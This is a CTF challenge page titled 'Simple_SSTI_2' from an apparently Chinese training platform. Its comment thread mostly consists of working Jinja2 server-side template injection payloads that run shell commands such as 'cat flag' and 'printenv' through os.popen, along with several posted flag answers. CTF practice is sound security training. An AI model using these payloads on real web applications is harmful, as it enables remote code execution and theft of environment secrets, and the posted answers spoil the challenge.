Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
15799
提 示:
描 述:
Simple_SSTI_2
评论
hao7 25天前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
Fusang 1月前
举报
?flag={{''.__class__.__base__.__subclasses__()[425].__init__.__globals__['os'].popen('cat flag').read()}}
超爱西西鸭 3月前
举报
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
pettter 4月前
举报
?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}
不会写代码的菜鸟 5月前
举报
大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀
qingchuan 4月前
举报
因为没有import os,os是未定义的
q1152874733 5月前
举报
http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}
Royic 5月前
举报
/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}
sz007 6月前
举报
flag{6c85015e98aa08e245d15289704dfd8b}
如你所愿 6月前
举报
flag{5566f3c3cc3821f4a768384d2a387aae}
109349 6月前
举报
flag{2682096b09e88fe5f1faee731c0d36d7}